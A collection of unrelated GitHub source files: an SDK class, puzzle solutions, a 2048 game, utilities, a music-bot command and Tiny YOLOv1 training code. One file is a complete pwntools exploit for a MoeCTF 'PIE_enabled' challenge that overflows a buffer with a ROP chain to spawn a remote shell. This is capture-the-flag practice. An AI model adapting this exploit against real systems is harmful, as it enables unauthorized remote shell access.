params['out_id'] = self.out_id
if self.time:
if hasattr(self.time, 'to_alipay_dict'):
params['time'] = self.time.to_alipay_dict()
else:
params['time'] = self.time
if self.title:
if hasattr(self.title, 'to_alipay_dict'):
params['title'] = self.title.to_alipay_dict()
else:
params['title'] = self.title
if self.type:
if hasattr(self.type, 'to_alipay_dict'):
params['type'] = self.type.to_alipay_dict()
else:
params['type'] = self.type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlarmInfo()
if 'ad_code' in d:
o.ad_code = d['ad_code']
if 'content' in d:
o.content = d['content']
if 'level' in d:
o.level = d['level']
if 'out_id' in d:
o.out_id = d['out_id']
if 'time' in d:
o.time = d['time']
if 'title' in d:
o.title = d['title']
if 'type' in d:
o.type = d['type']
return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/AlarmInfo.py | AlarmInfo.py | py | 3,389 | python | en | code | 241 | github-code | 13 |
16765879640 | import sys
def checkCol(col, board):
for row in board:
if row[col] != -1:
return False
return True
def checkRow(row, board):
for col in board[row]:
if col != -1:
return False
return True
def checkBoard(num, board):
done = False
for i in range(len(board)):
for j in range(len(board[i])):
if num == board[i][j]:
board[i][j] = -1
done = checkRow(i, board) or checkCol(j, board) or done
if done:
print("here!!", board, num)
#print(num, board)
return done
def calcUnmarkedNums(board):
total = 0
for row in board:
for col in row:
if col != -1:
total += col
return total
def part1():
with open("input.txt") as file:
lines = file.readlines()
lines = [line.strip() for line in lines if len(line.strip()) > 0]
drawn = [int(num) for num in lines[0].split(",")]
boards = []
for i in range(1, len(lines), 5):
board = []
for j in range(5):
board.append([int(num) for num in lines[i + j].split()])
boards.append(board)
total = 0
for d in drawn:
breakFlag = False
for i in range(len(boards)):
if checkBoard(d, boards[i]):
breakFlag = True
total = calcUnmarkedNums(boards[i])
break
if breakFlag:
break
print(d, total)
print(d * total)
def part2():
with open("input.txt") as file:
lines = file.readlines()
lines = [line.strip() for line in lines if len(line.strip()) > 0]
drawn = [int(num) for num in lines[0].split(",")]
boards = []
for i in range(1, len(lines), 5):
board = []
for j in range(5):
board.append([int(num) for num in lines[i + j].split()])
boards.append(board)
total = 0
boardChecked = [False for i in range(len(boards))]
finishOrder = []
for d in drawn:
for i in range(len(boards)):
if checkBoard(d, boards[i]) and not boardChecked[i]:
finishOrder.append((d, [[col for col in row] for row in boards[i]]))
boardChecked[i] = True
d, board = finishOrder.pop()
print(d, calcUnmarkedNums(board))
print(d * calcUnmarkedNums(board))
part2() | rbangamm/aoc-2021 | aoc-2021-python/aoc4.py | aoc4.py | py | 2,380 | python | en | code | 0 | github-code | 13 |
6329648143 | class Solution:
def searchInsert(self, nums: list[int], target: int):
if target in nums:
return nums.index(target)
if target < nums[0]:
return 0
if target > nums[len(nums)-1]:
return len(nums)
for i in range(len(nums)):
if nums[i] < target < nums[i+1]:
return i+1
if __name__ == '__main__':
nums = [3,5,7,9,10]
target = 8
result = Solution().searchInsert(nums, target)
print(result)
| N1kMA/Leetcode | search_insert_position.py | search_insert_position.py | py | 502 | python | en | code | 0 | github-code | 13 |
15549483355 | from pwn import *
from pwn import p64,u64
debug = 0
gdb_is = 0
# context(arch='i386',os = 'linux')
context(arch='amd64',os = 'linux', log_level='DEBUG')
if debug:
context.terminal = ['/mnt/c/Users/sagiriking/AppData/Local/Microsoft/WindowsApps/wt.exe','nt','Ubuntu','-c']
r = process("./pwn")
else:
host = "192.168.0.111:57201"
r = connect(host.split(':')[0],host.split(':')[1])#远程连接
gdb_is =0
if gdb_is:
# r = gdb.debug("./pwn",'b ')
# gdb.attach(r,'b ')
# gdb.attach(r)
pause()
elf = ELF('./pwn')
r.recvuntil(b"Vuln's address is:")
vuln_addr = int(r.recvuntil(b'\n')[2:-1].decode(),16)
offset = vuln_addr - elf.sym['vuln']
elf.address = offset
pop_rdi = 0x001323 + offset
binsh = 0x000004010 + offset
ret = 0x000000101a+ offset
paylod = b'A'*80 + b'junkjunk' + p64(pop_rdi) + p64(binsh) + p64(ret)+ p64(elf.sym['system'])
r.send(paylod)
r.interactive()
| Sagiring/Sagiring_pwn | MoeCTF2023/PIE_enabled/pwn_exp.py | pwn_exp.py | py | 937 | python | en | code | 1 | github-code | 13 |
41398002620 | import json
import glob
def create_category_json(path: str = "questions/questions.json") -> None:
"""
for each category we will create a list of the question ids and json file in a dict.
we will store result in questions/questions.json
"""
categories: dict = {}
question_part_count: int = len(glob.glob1('questions', "part*"))
# go through the question parts
cur_par_index: int = 0
for part in range(question_part_count):
with open(f"questions/part_{cur_par_index}.json", 'r') as part_file:
cur_part = json.loads(part_file.read())["result"]["records"]
for question in cur_part:
# removing all questions that aren't for cars
if r"«В»" in question["description4"]:
if question["category"] not in categories.keys():
categories[question["category"]] = [question]
else:
categories[question["category"]].append(question)
cur_par_index += 1
# dumping dict in file
with open(path, 'w') as categoriesFile:
json.dump(categories, categoriesFile, ensure_ascii=False)
def decrease_repeat_dict(repeat: dict, category_qustions_ids: dict):
"""we will go through the repeat dict. if question_id is in category we decrease it.
returns None or id of question that should be answered now
"""
return_value = None
# going through ids
for key in repeat.keys():
if int(key) in category_qustions_ids:
repeat[key] = repeat[key] - 1
if repeat[key] < 1:
return_value = int(key)
# if we pop the item
if return_value is not None:
repeat.pop(str(return_value))
print(repeat)
return return_value
| Bnux256/TheoryHelper | lib/count_category.py | count_category.py | py | 1,783 | python | en | code | 3 | github-code | 13 |
8004194558 | """
Clone of 2048 game.
http://www.codeskulptor.org/#user40_dSvByRSsOh3253F.py
"""
import poc_2048_gui
import random
# Directions, DO NOT MODIFY
UP = 1
DOWN = 2
LEFT = 3
RIGHT = 4
# Offsets for computing tile indices in each direction.
# DO NOT MODIFY this dictionary.
OFFSETS = {UP: (1, 0),
DOWN: (-1, 0),
LEFT: (0, 1),
RIGHT: (0, -1)}
def mov0end(lst):
"""
Function that moves zeros to the end of a list.
"""
newlist = []
count = 0
for number in range(len(lst)):
if lst[number] == 0:
newlist.append(lst[number])
else:
newlist.insert(count, lst[number])
count += 1
return newlist
def merge(line):
"""
Function that merges a single row or column in 2048.
"""
newlist = mov0end(line)
for number in range(len(newlist) - 1):
if newlist[number] != 0 and newlist[number + 1] == newlist[number]:
newlist[number] *= 2
newlist[number + 1] = 0
newlist = mov0end(newlist)
return newlist
class TwentyFortyEight:
"""
Class to run the game logic.
"""
def __init__(self, grid_height, grid_width):
self.grid_height = grid_height
self.grid_width = grid_width
self.newgrid = []
self.reset()
self.indD = {}
self.indD[UP] = [(0, col) for col in range(self.grid_width)]
self.indD[LEFT] = [(row, 0) for row in range(self.grid_height)]
self.indD[DOWN] = [(self.grid_height - 1, col)for col in range(self.grid_width)]
self.indD[RIGHT] = [(row, self.grid_width - 1)for row in range(self.grid_height)]
def reset(self):
"""
Reset the game so the grid is empty except for two
initial tiles.
"""
self.newgrid = [[0 for col in range(self.grid_width)] for row in range(self.grid_height)]
self.new_tile()
self.new_tile()
def __str__(self):
"""
Return a string representation of the grid for debugging.
"""
return ""
def get_grid_height(self):
"""
Get the height of the board.
"""
return self.grid_height
def get_grid_width(self):
"""
Get the width of the board.
"""
return self.grid_width
def move(self, direction):
"""
Move all tiles in the given direction and add
a new tile if any tiles moved.
"""
shift = False
row = 0
col = 0
if direction < 3:
atd = direction + 2
else:
atd = direction - 2
temp = []
for item in range(len(self.indD[direction])):
for count in range(len(self.indD[atd])):
row = self.indD[direction][item][0] + count * OFFSETS[direction][0]
col = self.indD[direction][item][1] + count * OFFSETS[direction][1]
temp.append(self.get_tile(row, col))
temp = merge(temp)
for count in range(len(temp)):
row = self.indD[direction][item][0] + count * OFFSETS[direction][0]
col = self.indD[direction][item][1] + count * OFFSETS[direction][1]
#print 'row:', row, 'col:', col
if self.newgrid[row][col] != temp[count]:
shift = True
self.set_tile(row, col, temp[count])
temp = []
if shift == True:
self.new_tile()
def new_tile(self):
"""
Create a new tile in a randomly selected empty
square. The tile should be 2 90% of the time and
4 10% of the time.
"""
col = 0
row = 0
while row < self.grid_height and col < self.grid_width:
row = random.randrange(0, self.grid_height)
col = random.randrange(0, self.grid_width)
#print 'row:', row, 'col:', col
if self.newgrid[row][col] == 0:
break
self.newgrid[row][col] = random.choice([2,2,2,2,2,2,2,2,2,4])
def set_tile(self, row, col, value):
"""
Set the tile at position row, col to have the given value.
"""
self.newgrid[row][col] = value
def get_tile(self, row, col):
"""
Return the value of the tile at position row, col.
"""
return self.newgrid[row][col]
poc_2048_gui.run_gui(TwentyFortyEight(5, 6))
| chickenoverrice/python_game | python_game2048.py | python_game2048.py | py | 4,444 | python | en | code | 0 | github-code | 13 |
38227794476 | #!/usr/bin/env/python3
# -*- coding: utf-8 -*-
__author__='drawnkid@gmail.com'
import sys
import os
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-a", "--append",dest = "append",action = "store_true",default = False,help = "append the string")
options, args = parser.parse_args()
if not len(args)==1:
print("One file needed.",file=sys.stderr)
sys.exit()
if not os.path.exists(args[0]):
print(args[0],": No such file or directory",file=sys.stderr)
sys.exit()
if not os.path.isfile(args[0]):
print(args[0],"is not a file.",file=sys.stderr())
sys.exit()
if options.append:
fd = open(args[0], 'a')
tmpInput = sys.stdin.read()
fd.write(tmpInput)
fd.close()
print(tmpInput)
else:
fd = open(args[0], 'w')
tmpInput = sys.stdin.read()
fd.write(tmpInput)
fd.close()
print(tmpInput)
| BaliStarDUT/hello-world | code/python/IO/tee_2.py | tee_2.py | py | 915 | python | en | code | 4 | github-code | 13 |
19158535215 | # Given a knapsack with maximum capacity W, and a set S consisting of n items
# Each item i has some weight wi and benefit value bi (all wi, bi and W are integer values)
# Problem: How to pack the knapsack to achieve maximum total value of packed items?
# Example:
# values = [60, 100, 120]
# weights = [10, 20, 30]
# W = 50
# weight = 10, value = 60
# weight = 20, value = 100
# weight = 30, value = 120
# weight = (20+10), value = (100+60)
# weight = (30+10), value = (120+60)
# weight = (30+20), value = (120+100) -> solution
# http://cse.unl.edu/~goddard/Courses/CSCE310J/Lectures/Lecture8-DynamicProgramming.pdf
# https://www.geeksforgeeks.org/0-1-knapsack-problem-dp-10/
def knapSack(W, wt, val, n):
K = [[0 for _ in range(W+1)] for _ in range(n+1)]
for i in range(n+1):
for w in range(W+1):
if i == 0 or w == 0:
K[i][w] = 0
elif wt[i-1] <= w:
K[i][w] = max(K[i-1][w], val[i-1] + K[i-1][w-wt[i-1]])
else:
K[i][w] = K[i-1][w]
return K[n][W]
val = [60, 100, 120]
wt = [10, 20, 30]
W = 50
n = len(val)
print(knapSack(W, wt, val, n)) | phamtamlinh/coding-challenges | basic/dynamic-programming/0-1-knapsack-problem.py | 0-1-knapsack-problem.py | py | 1,092 | python | en | code | 0 | github-code | 13 |
30140726420 | import argparse
from data_converter import utils
def convert(input_file, to_format):
"""Convert input_file into another format
Raises:
FileNotFoundError & UserWarning: from the function `_check_input_file`
ValueError
Returns:
str: Absolute file path of output file
"""
if not utils._is_file_ext_supported(to_format):
raise ValueError("File extension is not supported: {ext}".format(ext=to_format))
input_file = utils._check_input_file(input_file, to_format)
input_ext = utils._get_file_ext(input_file)
# Read in data
input_data = utils.converters[input_ext].read_file(input_file)
# Write out data
output_file = utils.rreplace(input_file, input_ext, to_format)
utils.converters[to_format].write_file(input_data, output_file)
return output_file
def cli():
"""Command line tool to convert data file into other formats
Notes:
Not using pathlib because trying to keep this as compatible as posiable with other versions
"""
parser = argparse.ArgumentParser(description='Convert data files')
parser.add_argument('-t', '--to', help='Output format', required=True)
parser.add_argument('input_file', help='File to convert')
args = parser.parse_args()
try:
print(convert(args.input_file, args.to))
except (FileNotFoundError, UserWarning, ValueError) as e:
parser.error(str(e))
| xtream1101/data-converter | data_converter/__init__.py | __init__.py | py | 1,424 | python | en | code | 2 | github-code | 13 |
12089083303 | # 练习2:为sum_data,增加打印函数执行时间的功能.
# 函数执行时间公式: 执行后时间 - 执行前时间
import time
# 装饰器函数
def exeture_time(func):
def wrapper(*args, **kwargs):
start_time = time.time()
result = func(*args, **kwargs)
times = time.time() - start_time
print('原函数执行的时间:', times)
return result
return wrapper
@exeture_time
def sum_data(n): # 原函数
sum_value = 0
for number in range(n):
sum_value += number
return sum_value
@exeture_time
def sum_data1(n): # 原函数
sum_value = 0
x = 0
while x < n:
sum_value += x
x += 1
return sum_value
print(sum_data(10))
print(sum_data1(10))
print(sum_data(1000000))
print(sum_data1(1000000)) | 15149295552/Code | Month01/Day15/exercise03.py | exercise03.py | py | 812 | python | zh | code | 1 | github-code | 13 |
36265574162 | def close(session, models=None):
'''
Close models.
Parameters
----------
models : list of models
These models and any submodels are closed. If models is none all models are closed.
'''
m = session.models
if models is None:
models = m.list()
# Avoid closing grouping models if not all child models are closed.
# This is so that "close ~#1.1" does not close grouping model #1.
hc = have_all_child_models(models)
cmodels = [cm for cm in models if cm in hc]
m.close(cmodels)
def have_all_child_models(models):
'''
Return a set containing those models in the given models that have all
child and descendant models in the given models.
'''
contains = set()
mset = set(models)
for m in models:
_contains_model_tree(m, mset, contains)
return contains
def _contains_model_tree(m, mset, contains):
if not m in mset:
return
cmodels = m.child_models()
for c in cmodels:
_contains_model_tree(c, mset, contains)
for c in cmodels:
if not c in contains:
return
contains.add(m)
def close_session(session):
session.reset()
def register_command(logger):
from chimerax.core.commands import CmdDesc, register, ModelsArg
desc = CmdDesc(optional=[('models', ModelsArg)],
synopsis='close models')
register('close', desc, close, logger=logger)
desc = CmdDesc(synopsis="clear session contents")
register('close session', desc, close_session, logger=logger)
| HamineOliveira/ChimeraX | src/bundles/std_commands/src/close.py | close.py | py | 1,549 | python | en | code | null | github-code | 13 |
20032798567 | #!/usr/bin/python3
"""
Minimum Operations
"""
def minOperations(n):
"""
method that calculates the fewest number of operations needed
to result in exactly n H characters in a file
resoluton method: look at the output for the first n = 15 strings
observe that if n is prime number, num_op = n
if n is not prime number, decompose n into prime numbers, sum
the prime numbers and return num_op = sum
"""
if n <= 1:
return 0
num_op = []
i = 2
while i < n + 1:
if (n % i) == 0:
num_op += [i]
n = n / i
else:
i += 1
return sum(num_op)
| dacastanogo/holbertonschool-interview | 0x03-minimum_operations/0-minoperations.py | 0-minoperations.py | py | 643 | python | en | code | 0 | github-code | 13 |
31190579625 | from pyrogram import filters
from pyrogram.types import Message
from strings import get_command
from AasthaMusicBot import app
from AasthaMusicBot.misc import SUDOERS
from AasthaMusicBot.utils.database import add_off, add_on
from AasthaMusicBot.utils.decorators.language import language
# Commands
MAINTENANCE_COMMAND = get_command("MAINTENANCE_COMMAND")
@app.on_message(filters.command(MAINTENANCE_COMMAND) & SUDOERS)
@language
async def maintenance(client, message: Message, _):
usage = _["maint_1"]
if len(message.command) != 2:
return await message.reply_text(usage)
message.chat.id
state = message.text.split(None, 1)[1].strip()
state = state.lower()
if state == "enable":
user_id = 1
await add_on(user_id)
await message.reply_text(_["maint_2"])
elif state == "disable":
user_id = 1
await add_off(user_id)
await message.reply_text(_["maint_3"])
else:
await message.reply_text(usage)
| Ozlembener/AasthaTGMusicBot | AasthaMusicBot/plugins/sudo/maintenance.py | maintenance.py | py | 988 | python | en | code | 1 | github-code | 13 |
21414347697 | from unittest import TextTestResult
import subprocess
import yaml
class TextTestResultWithSuccesses(TextTestResult):
"""
This class extends TextTestResult so that successful tests get reported in `self.successes`.
"""
def __init__(self, *args, **kwargs):
super(TextTestResultWithSuccesses, self).__init__(*args, **kwargs)
self.successes = []
def addSuccess(self, test):
super(TextTestResultWithSuccesses, self).addSuccess(test)
self.successes.append(test)
def execute_command(command):
completed_process = subprocess.run(command, shell=True, executable="/bin/bash",
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
result = dict()
result["exit-code"] = completed_process.returncode
result["output"] = completed_process.stdout.decode("utf-8").strip()
result["error"] = completed_process.stderr.decode("utf-8").strip()
return result
def parse_yaml_file(path):
with open(path, "r") as f:
yaml_content = yaml.full_load(f)
return yaml_content
def nested_get(dictionary, *keys):
value = dictionary
for key in keys:
try:
value = value[key]
except KeyError:
value = None
return value
| AlassaneNdiaye/test-containers | test_containers/utils.py | utils.py | py | 1,267 | python | en | code | 0 | github-code | 13 |
32954770392 | import base64
import importlib
import io
from datetime import datetime
from typing import Dict, TypedDict
import cv2
import numpy
from cv2 import Mat, imencode, imread
class Images(TypedDict):
original: Mat
before: Mat
after: Mat
Paths = Dict[str, Images]
class ImageManager:
images: Paths = dict()
def load_image(self, path: str):
"""Loads the initial image"""
images = self.get_image(path)
image = images.get('original')
# return self.get_quadrants(image)
# rgba = cv2.cvtColor(image, COLOR_BGR2RGBA)
# flat = rgba.flatten('F')
# return flat
# r, g, b, a = cv2.split(rgba)
# return r.tolist()
# print(r.size)
# return to_image(image).tolist()
return image
def process_image(self, name: str, path: str, data: any = None):
print('processing: ' + name)
d1 = datetime.now()
images = self.get_image(path)
module = importlib.import_module('adjustments.' + name)
if data is None:
module.main(images)
else:
module.main(images, data)
image = images.get('after')
# formatted_image = self. to_image(image)
# quads = self.get_quadrants(image)
d2 = datetime.now()
delta = d2 - d1
print('finished: ' + name + ' in ' + str(delta.total_seconds()) + ' seconds')
return image
def get_image(self, path: str):
image_data = self.images.get(path, None)
if image_data is None:
image_data = self.images[path] = dict()
# The original image without changes
image_data['original'] = imread(path)
# The current state of the image before changes
image_data['before'] = imread(path)
# The state of the image after changes
image_data['after'] = imread(path)
return image_data
def apply_image(self, path: str):
"""Applies the the state to the image"""
images = self.get_image(path)
images['before'] = images.get('after').copy()
return images['before']
def cancel_image(self, path: str):
"""Reverts the state back to the how the image was"""
images = self.get_image(path)
return images['before']
def to_image(self, image: Mat, ext='.jpg', quality=100) -> numpy.ndarray:
retval, buffer = imencode(ext, image, [
int(cv2.IMWRITE_JPEG_QUALITY), quality,
int(cv2.IMWRITE_PNG_COMPRESSION), max(int(quality/100*10), 1),
int(cv2.IMWRITE_WEBP_QUALITY), quality
])
return buffer
def get_quadrants(self, image: Mat):
height, width, other = image.shape
# [rows, columns]
q1 = image[0:int(height/2), 0:int(width/2)].copy()
q2 = image[0:int(height/2), int(width/2):int(width)].copy()
q3 = image[int(height/2):int(height), 0:int(width/2)].copy()
q4 = image[int(height/2):int(height), int(width/2):int(width)].copy()
return [
# Top left
{'x': 0, 'y': 0, 'i': self.to_image(q1)},
# Top right
{'x': int(width/2), 'y': 0, 'i': self.to_image(q2)},
# # Bottom left
{'x': 0, 'y': int(height/2), 'i': self.to_image(q3)},
# # Bottom right
{'x': int(width/2), 'y': int(height/2), 'i': self.to_image(q4)}
]
| TheColorRed/image-editor | image-processor/Source/utils/image.py | image.py | py | 3,424 | python | en | code | 0 | github-code | 13 |
13944276872 |
################# model_tiny.py
from tensorflow.keras.layers import Conv2D, MaxPooling2D, \
Flatten, Dense, Reshape, LeakyReLU, BatchNormalization
# from tensorflow.keras.layers.normalization import
from tensorflow.keras.regularizers import l2
# from tensorflow.keras.engine.topology import Layer
from tensorflow.keras.layers import Layer
import tensorflow.keras.backend as K
class Yolo_Reshape(Layer):
def __init__(self, target_shape, **kwargs):
super(Yolo_Reshape, self).__init__(**kwargs)
self.target_shape = tuple(target_shape)
def compute_output_shape(self, input_shape):
return (input_shape[0],) + self.target_shape
def call(self, inputs, **kwargs):
S = [self.target_shape[0], self.target_shape[1]]
C = 20
B = 2
idx1 = S[0] * S[1] * C
idx2 = idx1 + S[0] * S[1] * B
# class prediction
class_probs = K.reshape(
inputs[:, :idx1], (K.shape(inputs)[0],) + tuple([S[0], S[1], C]))
class_probs = K.softmax(class_probs)
# confidence
confs = K.reshape(
inputs[:, idx1:idx2], (K.shape(inputs)[0],) + tuple([S[0], S[1], B]))
confs = K.sigmoid(confs)
# boxes
boxes = K.reshape(
inputs[:, idx2:], (K.shape(inputs)[0],) + tuple([S[0], S[1], B * 4]))
boxes = K.sigmoid(boxes)
# return np.array([class_probs, confs, boxes])
outputs = K.concatenate([class_probs, confs, boxes])
return outputs
def model_tiny_yolov1(inputs):
x = Conv2D(16, (3, 3), padding='same', name='convolutional_0', use_bias=False,
kernel_regularizer=l2(5e-4), trainable=False)(inputs)
x = BatchNormalization(name='bnconvolutional_0', trainable=False)(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D((2, 2), strides=(2, 2), padding='same')(x)
x = Conv2D(32, (3, 3), padding='same', name='convolutional_1', use_bias=False,
kernel_regularizer=l2(5e-4), trainable=False)(x)
x = BatchNormalization(name='bnconvolutional_1', trainable=False)(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D((2, 2), strides=(2, 2), padding='same')(x)
x = Conv2D(64, (3, 3), padding='same', name='convolutional_2', use_bias=False,
kernel_regularizer=l2(5e-4), trainable=False)(x)
x = BatchNormalization(name='bnconvolutional_2', trainable=False)(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D((2, 2), strides=(2, 2), padding='same')(x)
x = Conv2D(128, (3, 3), padding='same', name='convolutional_3', use_bias=False,
kernel_regularizer=l2(5e-4), trainable=False)(x)
x = BatchNormalization(name='bnconvolutional_3', trainable=False)(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D((2, 2), strides=(2, 2), padding='same')(x)
x = Conv2D(256, (3, 3), padding='same', name='convolutional_4', use_bias=False,
kernel_regularizer=l2(5e-4), trainable=False)(x)
x = BatchNormalization(name='bnconvolutional_4', trainable=False)(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D((2, 2), strides=(2, 2), padding='same')(x)
x = Conv2D(512, (3, 3), padding='same', name='convolutional_5', use_bias=False,
kernel_regularizer=l2(5e-4), trainable=False)(x)
x = BatchNormalization(name='bnconvolutional_5', trainable=False)(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D((2, 2), strides=(2, 2), padding='same')(x)
x = Conv2D(1024, (3, 3), padding='same', name='convolutional_6', use_bias=False,
kernel_regularizer=l2(5e-4), trainable=False)(x)
x = BatchNormalization(name='bnconvolutional_6', trainable=False)(x)
x = LeakyReLU(alpha=0.1)(x)
x = Conv2D(256, (3, 3), padding='same', name='convolutional_7', use_bias=False,
kernel_regularizer=l2(5e-4), trainable=False)(x)
x = BatchNormalization(name='bnconvolutional_7', trainable=False)(x)
x = LeakyReLU(alpha=0.1)(x)
x = Flatten()(x)
x = Dense(1470, activation='linear', name='connected_0')(x)
# outputs = Reshape((7, 7, 30))(x)
outputs = Yolo_Reshape((7, 7, 30))(x)
return outputs
################# yolo.py
import tensorflow.keras.backend as K
def xywh2minmax(xy, wh):
xy_min = xy - wh / 2
xy_max = xy + wh / 2
return xy_min, xy_max
def iou(pred_mins, pred_maxes, true_mins, true_maxes):
intersect_mins = K.maximum(pred_mins, true_mins)
intersect_maxes = K.minimum(pred_maxes, true_maxes)
intersect_wh = K.maximum(intersect_maxes - intersect_mins, 0.)
intersect_areas = intersect_wh[..., 0] * intersect_wh[..., 1]
pred_wh = pred_maxes - pred_mins
true_wh = true_maxes - true_mins
pred_areas = pred_wh[..., 0] * pred_wh[..., 1]
true_areas = true_wh[..., 0] * true_wh[..., 1]
union_areas = pred_areas + true_areas - intersect_areas
iou_scores = intersect_areas / union_areas
return iou_scores
def yolo_head(feats):
# Dynamic implementation of conv dims for fully convolutional model.
conv_dims = K.shape(feats)[1:3] # assuming channels last
# In YOLO the height index is the inner most iteration.
conv_height_index = K.arange(0, stop=conv_dims[0])
conv_width_index = K.arange(0, stop=conv_dims[1])
conv_height_index = K.tile(conv_height_index, [conv_dims[1]])
# TODO: Repeat_elements and tf.split doesn't support dynamic splits.
# conv_width_index = K.repeat_elements(conv_width_index, conv_dims[1], axis=0)
conv_width_index = K.tile(
K.expand_dims(conv_width_index, 0), [conv_dims[0], 1])
conv_width_index = K.flatten(K.transpose(conv_width_index))
conv_index = K.transpose(K.stack([conv_height_index, conv_width_index]))
conv_index = K.reshape(conv_index, [1, conv_dims[0], conv_dims[1], 1, 2])
conv_index = K.cast(conv_index, K.dtype(feats))
conv_dims = K.cast(K.reshape(conv_dims, [1, 1, 1, 1, 2]), K.dtype(feats))
box_xy = (feats[..., :2] + conv_index) / conv_dims * 448
box_wh = feats[..., 2:4] * 448
return box_xy, box_wh
def yolo_loss(y_true, y_pred):
label_class = y_true[..., :20] # ? * 7 * 7 * 20
label_box = y_true[..., 20:24] # ? * 7 * 7 * 4
response_mask = y_true[..., 24] # ? * 7 * 7
response_mask = K.expand_dims(response_mask) # ? * 7 * 7 * 1
predict_class = y_pred[..., :20] # ? * 7 * 7 * 20
predict_trust = y_pred[..., 20:22] # ? * 7 * 7 * 2
predict_box = y_pred[..., 22:] # ? * 7 * 7 * 8
_label_box = K.reshape(label_box, [-1, 7, 7, 1, 4])
_predict_box = K.reshape(predict_box, [-1, 7, 7, 2, 4])
label_xy, label_wh = yolo_head(_label_box) # ? * 7 * 7 * 1 * 2, ? * 7 * 7 * 1 * 2
label_xy = K.expand_dims(label_xy, 3) # ? * 7 * 7 * 1 * 1 * 2
label_wh = K.expand_dims(label_wh, 3) # ? * 7 * 7 * 1 * 1 * 2
label_xy_min, label_xy_max = xywh2minmax(label_xy, label_wh) # ? * 7 * 7 * 1 * 1 * 2, ? * 7 * 7 * 1 * 1 * 2
predict_xy, predict_wh = yolo_head(_predict_box) # ? * 7 * 7 * 2 * 2, ? * 7 * 7 * 2 * 2
predict_xy = K.expand_dims(predict_xy, 4) # ? * 7 * 7 * 2 * 1 * 2
predict_wh = K.expand_dims(predict_wh, 4) # ? * 7 * 7 * 2 * 1 * 2
predict_xy_min, predict_xy_max = xywh2minmax(predict_xy, predict_wh) # ? * 7 * 7 * 2 * 1 * 2, ? * 7 * 7 * 2 * 1 * 2
iou_scores = iou(predict_xy_min, predict_xy_max, label_xy_min, label_xy_max) # ? * 7 * 7 * 2 * 1
best_ious = K.max(iou_scores, axis=4) # ? * 7 * 7 * 2
best_box = K.max(best_ious, axis=3, keepdims=True) # ? * 7 * 7 * 1
box_mask = K.cast(best_ious >= best_box, K.dtype(best_ious)) # ? * 7 * 7 * 2
no_object_loss = 0.5 * (1 - box_mask * response_mask) * K.square(0 - predict_trust)
object_loss = box_mask * response_mask * K.square(1 - predict_trust)
confidence_loss = no_object_loss + object_loss
confidence_loss = K.sum(confidence_loss)
class_loss = response_mask * K.square(label_class - predict_class)
class_loss = K.sum(class_loss)
_label_box = K.reshape(label_box, [-1, 7, 7, 1, 4])
_predict_box = K.reshape(predict_box, [-1, 7, 7, 2, 4])
label_xy, label_wh = yolo_head(_label_box) # ? * 7 * 7 * 1 * 2, ? * 7 * 7 * 1 * 2
predict_xy, predict_wh = yolo_head(_predict_box) # ? * 7 * 7 * 2 * 2, ? * 7 * 7 * 2 * 2
box_mask = K.expand_dims(box_mask)
response_mask = K.expand_dims(response_mask)
box_loss = 5 * box_mask * response_mask * K.square((label_xy - predict_xy) / 448)
box_loss += 5 * box_mask * response_mask * K.square((K.sqrt(label_wh) - K.sqrt(predict_wh)) / 448)
box_loss = K.sum(box_loss)
loss = confidence_loss + class_loss + box_loss
return loss
################ data_sequence.py
from tensorflow.keras.utils import Sequence
import math
import cv2 as cv
import numpy as np
import os
class SequenceData(Sequence):
def __init__(self, model, dir, target_size, batch_size, shuffle=True):
self.model = model
self.datasets = []
if self.model is 'train':
with open(os.path.join(dir, '2007_train.txt'), 'r') as f:
self.datasets = self.datasets + f.readlines()
elif self.model is 'val':
with open(os.path.join(dir, '2007_val.txt'), 'r') as f:
self.datasets = self.datasets + f.readlines()
self.image_size = target_size[0:2]
self.batch_size = batch_size
self.indexes = np.arange(len(self.datasets))
self.shuffle = shuffle
def __len__(self):
# 计算每一个epoch的迭代次数
num_imgs = len(self.datasets)
return math.ceil(num_imgs / float(self.batch_size))
def __getitem__(self, idx):
# 生成batch_size个索引
batch_indexs = self.indexes[idx * self.batch_size:(idx + 1) * self.batch_size]
# 根据索引获取datas集合中的数据
batch = [self.datasets[k] for k in batch_indexs]
# 生成数据
X, y = self.data_generation(batch)
return X, y
def on_epoch_end(self):
# 在每一次epoch结束是否需要进行一次随机,重新随机一下index
if self.shuffle:
np.random.shuffle(self.indexes)
def read(self, dataset):
dataset = dataset.strip().split()
image_path = dataset[0]
label = dataset[1:]
image = cv.imread(image_path)
image = cv.cvtColor(image, cv.COLOR_BGR2RGB) # opencv读取通道顺序为BGR,所以要转换
image_h, image_w = image.shape[0:2]
image = cv.resize(image, self.image_size)
image = image / 255.
label_matrix = np.zeros([7, 7, 25])
for l in label:
l = l.split(',')
l = np.array(l, dtype=np.int)
xmin = l[0]
ymin = l[1]
xmax = l[2]
ymax = l[3]
cls = l[4]
x = (xmin + xmax) / 2 / image_w
y = (ymin + ymax) / 2 / image_h
w = (xmax - xmin) / image_w
h = (ymax - ymin) / image_h
loc = [7 * x, 7 * y]
loc_i = int(loc[1])
loc_j = int(loc[0])
y = loc[1] - loc_i
x = loc[0] - loc_j
if label_matrix[loc_i, loc_j, 24] == 0:
label_matrix[loc_i, loc_j, cls] = 1
label_matrix[loc_i, loc_j, 20:24] = [x, y, w, h]
label_matrix[loc_i, loc_j, 24] = 1 # response
return image, label_matrix
def data_generation(self, batch_datasets):
images = []
labels = []
for dataset in batch_datasets:
image, label = self.read(dataset)
images.append(image)
labels.append(label)
X = np.array(images)
y = np.array(labels)
return X, y
#################### train.py
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, TensorBoard
import os
from models.model_tiny_yolov1 import model_tiny_yolov1
from data_sequence import SequenceData
from yolo.yolo import yolo_loss
from callback import callback
import tensorflow as tf
epochs = 10
batch_size = 32
datasets_path = ''
def _main():
epochs = epochs
batch_size = batch_size
input_shape = (448, 448, 3)
inputs = Input(input_shape)
yolo_outputs = model_tiny_yolov1(inputs)
